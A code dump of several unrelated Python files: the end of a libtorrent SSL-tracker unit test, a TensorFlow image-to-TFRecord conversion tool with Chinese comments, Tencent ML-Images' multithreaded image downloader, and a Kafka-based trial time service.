self.settings["validate_https_trackers"] = False
self.session = lt.session(self.settings)
self.dir = tempfile.TemporaryDirectory()
self.atp = lt.add_torrent_params()
self.atp.info_hash = dummy_data.get_sha1_hash()
self.atp.flags &= ~lt.torrent_flags.auto_managed
self.atp.flags &= ~lt.torrent_flags.paused
self.atp.save_path = self.dir.name
def tearDown(self):
# we do this because sessions writing data can collide with
# cleaning up temporary directories. session.abort() isn't bound
handles = self.session.get_torrents()
for handle in handles:
self.session.remove_torrent(handle)
for _ in loop_until_timeout(5, msg="clear all handles"):
if not any(handle.is_valid() for handle in handles):
break
cleanup_with_windows_fix(self.dir, timeout=5)
self.tracker.shutdown()
# Explicitly clean up server sockets, to avoid ResourceWarning
self.tracker.server_close()
def test_external_ip_alert_via_ssl_tracker(self):
handle = self.session.add_torrent(self.atp)
handle.add_tracker({"url": self.tracker_url})
alert = wait_for(self.session, lt.external_ip_alert, timeout=60)
self.assertEqual(alert.category(), lt.alert_category.status)
self.assertEqual(alert.what(), "external_ip")
self.assertIsInstance(alert.message(), str)
self.assertNotEqual(alert.message(), "")
self.assertEqual(str(alert), alert.message())
self.assertEqual(alert.external_address, "1.2.3.4")
if __name__ == '__main__':
print(lt.__version__)
try:
shutil.copy(os.path.join('..', '..', 'test', 'test_torrents',
'url_seed_multi.torrent'), '.')
except shutil.SameFileError:
pass
try:
shutil.copy(os.path.join('..', '..', 'test', 'test_torrents',
'base.torrent'), '.')
except shutil.SameFileError:
pass
try:
shutil.copy(os.path.join('..', '..', 'test', 'test_torrents',
'unordered.torrent'), '.')
except shutil.SameFileError:
pass
unittest.main()
|
tfrecord.py
|
# coding:utf-8
# 2019-1-10
# tf-record tool
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
import logging
__all__ = ['main']
def check_and_set_default_args(input_para):
    assert not (input_para['train_shards'] % input_para['num_threads']
                or input_para['validation_shards'] % input_para['num_threads']), (
        "train_shards and validation_shards must both be divisible by num_threads")
def _find_image_files(data_dir,
labels_file,
class_label_base):
"""
return:
filenames : list, data_dir下所有图片名
texts : list, 父文件名
labels : list, 每张图片对应的分类索引,下标从class_label_base开始
"""
logging.info('处理的数据来源于 %s.' % data_dir)
unique_labels = [l.strip() for l in tf.gfile.FastGFile(
labels_file, 'r').readlines()] # 获得需要处理的文件列表
labels, filenames, texts = [], [], []
label_index = class_label_base
    # collect the images under each class directory
    for text in unique_labels:
        pic_file_pattern = '%s/%s/*' % (data_dir, text)  # glob pattern, `*` matches any file name
        matching_files = []
        try:
            matching_files = tf.gfile.Glob(pic_file_pattern)
        except tf.errors.OpError:
            logging.warning('failed to glob %s' % pic_file_pattern)
        labels.extend([label_index] * len(matching_files))  # class index
        texts.extend([text] * len(matching_files))  # parent directory (class) name
        filenames.extend(matching_files)  # image file names
        logging.info("class %s: %s files processed so far" % (
            label_index, len(labels)))
        label_index += 1
    # shuffle the lists
    shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
texts = [texts[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
    logging.info('In %s, found %d images and %d labels.' %
                 (data_dir, len(filenames), len(unique_labels)))
return filenames, texts, labels
class ImageCoder(object):
"""
将TensorFlow图像读取转换
"""
def __init__(self):
self._sess = tf.Session() # 创建Session处理图像
# 将PNG转换为JPEG
self._png_data = tf.placeholder(dtype=tf.string) # 读取图片未经过解码为字符串
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# JPEG解码
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
        assert image.shape[2] == 3, 'image is not 3-channel'
return image
def _is_png(filename):
"""
return bool
"""
return '.png' in filename
def _process_image(filename, coder):
"""
读取图片
return:
image_buffer: string, JPEG
height: int
width: int
"""
with open(filename, 'rb') as f:
image_data = f.read()
if _is_png(filename):
        logging.info('%s converted to JPEG' % filename)
        image_data = coder.png_to_jpeg(image_data)
    image = coder.decode_jpeg(image_data)  # decode the JPEG to get the image attributes
    assert len(image.shape) == 3
    assert image.shape[2] == 3, 'image is not 3-channel'
height, width = image.shape[0], image.shape[1]
return image_data, height, width
def _int64_feature(value):
"""
转换为int64格式
"""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _bytes_feature(value):
"""
转换为bytes
"""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename,
image_buffer,
label,
text,
height,
width):
"""
使用tf.train.Example生成 Example proto
"""
colorspace = b'RGB'
channels = 3
image_format = b'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(colorspace),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/text': _bytes_feature(str.encode(text)),
'image/format': _bytes_feature(image_format),
'image/filename': _bytes_feature(os.path.basename(str.encode(filename))),
'image/encoded': _bytes_feature(image_buffer)}))
return example
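# Illustrative sketch (hypothetical helper, not part of the original tool):
# records written by _convert_to_example can be read back with the matching
# TF 1.x parsing spec below; adjust the keys to whatever reader pipeline is
# actually in use.
def _parse_example_sketch(serialized_example):
    features = tf.parse_single_example(
        serialized_example,
        features={
            'image/height': tf.FixedLenFeature([], tf.int64),
            'image/width': tf.FixedLenFeature([], tf.int64),
            'image/class/label': tf.FixedLenFeature([], tf.int64),
            'image/class/text': tf.FixedLenFeature([], tf.string, default_value=''),
            'image/encoded': tf.FixedLenFeature([], tf.string),
        })
    image = tf.image.decode_jpeg(features['image/encoded'], channels=3)
    return image, features['image/class/label']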
def _process_image_files_batch(coder,
thread_index,
ranges,
name,
filenames,
texts,
labels,
num_shards,
output_dir,
dataset_name):
"""
每个线程的call函数
"""
num_threads = len(ranges) # 计算线程数
assert not num_shards % num_threads, 'num_shars必须能整除num_threads'
num_shards_per_batch = int(num_shards / num_threads) # 每个线程需要处理的数据
shard_ranges = np.linspace(
ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
    num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]  # number of images this thread handles
counter = 0
    for s in range(num_shards_per_batch):
        shard = thread_index * num_shards_per_batch + s  # global index of the shard being written
        output_filename = '%s_%s_%.5d-of-%.5d.tfrecord' % (dataset_name, name, shard, num_shards)
        output_file = os.path.join(output_dir, output_filename)
        writer = tf.python_io.TFRecordWriter(output_file)
        shard_counter = 0
        files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)  # file indices in this shard
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
text = texts[i]
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(
filename,
image_buffer,
label,
text,
height,
                width)  # build the tf.train.Example for this image
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 300:
logging.info('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
logging.info('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
logging.info('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
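# Worked example: with num_shards=8 and num_threads=2, num_shards_per_batch is 4,
# so thread 0 writes shards 0-3 and thread 1 writes shards 4-7; shard_ranges then
# splits that thread's [start, end) slice of the file list evenly across its shards.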
def _process_image_files(name,
filenames,
texts,
labels,
num_shards,
num_threads,
output_dir,
dataset_name):
    # sanity check: every image has both a class name and a label
    assert len(filenames) == len(texts)
    assert len(filenames) == len(labels)
    # split the file list into num_threads chunks, e.g.
    # np.linspace(0, 20, 4 + 1).astype(int) -> [ 0  5 10 15 20]
    spacing = np.linspace(0, len(filenames), num_threads + 1).astype(int)
    # build the [start, end) ranges
ranges = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
    logging.info('Launching %s threads' % num_threads)
    sys.stdout.flush()  # flush output
    coord = tf.train.Coordinator()  # coordinates the threads
    coder = ImageCoder()  # shared image-processing helper
    # start the worker threads
threads = []
for thread_index in range(len(ranges)): # range(num_threads)
args = (coder, thread_index, ranges, name, filenames, texts, labels, num_shards, output_dir, dataset_name)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
coord.join(threads)
    logging.info('%s : finished converting %d images.' %
                 (datetime.now(), len(filenames)))
sys.stdout.flush()
def process_dataset(name,
directory,
num_shards,
labels_file,
num_threads,
output_dir,
dataset_name,
class_label_base):
filenames, texts, labels = _find_image_files(directory, labels_file, class_label_base)
_process_image_files(name, filenames, texts, labels, num_shards, num_threads, output_dir, dataset_name)
def main(input_para):
logging.info('Saving results to %s' % input_para['output_dir'])
process_dataset(
'validation',
input_para['validation_dir'],
input_para['validation_shards'],
input_para['labels_file'],
input_para['num_threads'],
input_para['output_dir'],
input_para['dataset_name'],
input_para['class_label_base'])
    process_dataset(
        'train',
        input_para['train_dir'],
        input_para['train_shards'],
        input_para['labels_file'],
        input_para['num_threads'],
        input_para['output_dir'],
        input_para['dataset_name'],
        input_para['class_label_base'])
logging.info('%s : Finish!' % datetime.now())
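# Hypothetical example of the expected input (keys are taken from the code above,
# the values are placeholders; both shard counts must be divisible by num_threads):
# input_para = {
#     'train_dir': '/data/train',
#     'validation_dir': '/data/validation',
#     'labels_file': '/data/labels.txt',
#     'train_shards': 8,
#     'validation_shards': 2,
#     'num_threads': 2,
#     'output_dir': '/data/tfrecords',
#     'dataset_name': 'my_dataset',
#     'class_label_base': 0,
# }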
if __name__ == '__main__':
input_para = {
}
main(input_para)
|
download_urls_multithreading.py
|
#!/usr/bin/env python
"""
Tencent is pleased to support the open source community by making Tencent ML-Images available.
Copyright (C) 2018 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the BSD 3-Clause License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
https://opensource.org/licenses/BSD-3-Clause
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and limitations under the License.
"""
import os
import sys
try:
    from urllib.request import urlretrieve  # Python 3
except ImportError:
    from urllib import urlretrieve  # Python 2
import argparse
import threading,signal
import time
import socket
socket.setdefaulttimeout(10.0)
def downloadImg(start, end, url_list, save_dir):
global record,count,count_invalid,is_exit
im_names = []
with open(url_list, 'r') as url_f:
for line in url_f.readlines()[start:end]:
sp = line.rstrip('\n').split('\t')
url = sp[0]
im_name = url.split('/')[-1]
            try:
                urlretrieve(url, os.path.join(save_dir, im_name))
                record += 1
                im_file_Record.write(im_name + '\t' + '\t'.join(sp[1:]) + '\n')
                print('url = {} is finished and {} imgs have been downloaded of all {} imgs'.format(url, record, count))
            except IOError as e:
                print("The url {} is ***INVALID***: {}".format(url, e))
                invalid_file.write(url + '\n')
                count_invalid += 1
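# Expected input format (hypothetical example line): each row of --url_list is
# tab-separated with the URL in the first column; the remaining columns are copied
# verbatim into --im_list next to the downloaded file name, e.g.
#   http://example.com/images/0001.jpg<TAB>label_a<TAB>label_b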
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--url_list', type=str, help='the url list file')
parser.add_argument('--im_list', type=str, default='img.txt',help='the image list file')
    parser.add_argument('--num_threads', type=int, default=8, help='the number of download threads')
parser.add_argument('--save_dir', type=str, default='./images', help='the directory to save images')
args = parser.parse_args()
url_list = args.url_list
im_list = args.im_list
num_threads = args.num_threads
save_dir = args.save_dir
# create savedir
if not os.path.isdir(save_dir):
os.mkdir(save_dir)
count = 0 # the num of urls
count_invalid = 0 # the num of invalid urls
record = 0
with open(url_list,'r') as f:
for line in f:
count += 1
part = int(count/num_threads)
with open(im_list, 'w') as im_file_Record,open('invalid_url.txt','w') as invalid_file: # record the downloaded imgs
thread_list = []
for i in range(num_threads):
if(i == num_threads-1):
t = threading.Thread(target = downloadImg, kwargs={'start':i*part, 'end':count, 'url_list':url_list, 'save_dir':save_dir})
else:
t = threading.Thread(target = downloadImg, kwargs={'start':i*part, 'end':(i+1)*part, 'url_list':url_list, 'save_dir':save_dir})
            t.daemon = True
thread_list.append(t)
t.start()
for i in range(num_threads):
            try:
                while thread_list[i].is_alive():
                    time.sleep(0.1)
except KeyboardInterrupt:
break
if count_invalid==0:
print ("all {} imgs have been downloaded!".format(count))
else:
print("{}/{} imgs have been downloaded, {} URLs are invalid".format(count-count_invalid, count, count_invalid))
|
time_service.py
|
from ..kafka.consumer_manager import ConsumerManager
from datetime import datetime
import threading
import logging
def milliseconds_since_epoch(date):
return int((date - datetime(1970, 1, 1)).total_seconds() * 1000)
def millisecond_since_date(date):
# Get delta time since last update
dt = datetime.now() - date
# Convert dt to milliseconds
return (((dt.days * 24 * 60 * 60 + dt.seconds) * 1000000) + dt.microseconds) / 1000
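# Worked example: for a delta of 1 day, 2 seconds and 500000 microseconds the
# formula above gives (((1*86400 + 2) * 1000000) + 500000) / 1000 = 86402500.0 ms.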
def get_field_value(message, field, default_value):
try:
return message['decoded_value'][0][field]
except (IndexError, KeyError):
logging.error("Time service: %s field expected in message but not present, assuming %s" %
(field, str(default_value)))
return default_value
def is_field_present(message, field):
try:
check = message['decoded_value'][0][field]
return True
except (IndexError, KeyError):
return False
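# Illustrative message shape (field names come from the accessors in this module,
# the values are hypothetical):
# example_message = {
#     'decoded_value': [{
#         'updatedAt': 1546300800000,    # ms since epoch
#         'trialTime': 1546300800000,    # ms since epoch
#         'trialTimeSpeed': 1.0,
#         'timeElapsed': 0,
#         'state': 'Idle',
#     }]
# }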
class TimeService:
def __init__(self,
kafka_system_time_consumer: ConsumerManager):
# Add handler for system time control messages
kafka_system_time_consumer.on_message += self.on_system_time_message
# Time variables
self.localUpdatedSimTimeAt = datetime.now()
self.inputUpdatedAt = milliseconds_since_epoch(self.localUpdatedSimTimeAt)
self.trialTime = milliseconds_since_epoch(self.localUpdatedSimTimeAt)
self.timeElapsed = 0
self.trialTimeSpeed = 1.0 # 0 means pause, 1 is real-time
self.state = "Idle"
# Create threads
self.system_time_consumer_thread = threading.Thread(target=kafka_system_time_consumer.listen_messages)
        self.system_time_consumer_thread.daemon = True  # stop this thread when the main thread exits
self.system_time_consumer_thread.start()
def stop(self):
self.system_time_consumer_thread.join()
def on_system_time_message(self, message):
# logging.info("system_time message received: " + str(message))
latency = 0 # self.localUpdatedSimTimeAt - self.updatedAt
self.inputUpdatedAt = get_field_value(message, 'updatedAt', self.inputUpdatedAt)
self.trialTimeSpeed = get_field_value(message, 'trialTimeSpeed', self.trialTimeSpeed)
self.timeElapsed = get_field_value(message, 'timeElapsed', self.timeElapsed)
self.state = get_field_value(message, 'state', self.state)
# TrialTime is special. Rx timestamp is not updated if this field is not present
if is_field_present(message, 'trialTime'):
self.localUpdatedSimTimeAt = datetime.now()
self.trialTime = message['decoded_value'][0]['trialTime'] + (latency * self.trialTimeSpeed)
else:
logging.error("Time service: trialTime field expected in message but not present")
def get_trial_date(self):
""" Returns UTC date of trial time """
        # Return the projected trial date while running, otherwise the current wall-clock time
        elapsed_ms = millisecond_since_date(self.localUpdatedSimTimeAt) * self.trialTimeSpeed
        return datetime.fromtimestamp((self.trialTime + elapsed_ms) / 1000.0) if self.state != "Idle" else datetime.now()
def get_trial_elapsed_time(self):
""" Returns number of milliseconds elapsed since Unix Epoch """
return self.trialTime + millisecond_since_date(self.localUpdatedSimTimeAt)
def get_trial_speed(self):
""" Returns current trial speed """
return self.trialTimeSpeed
|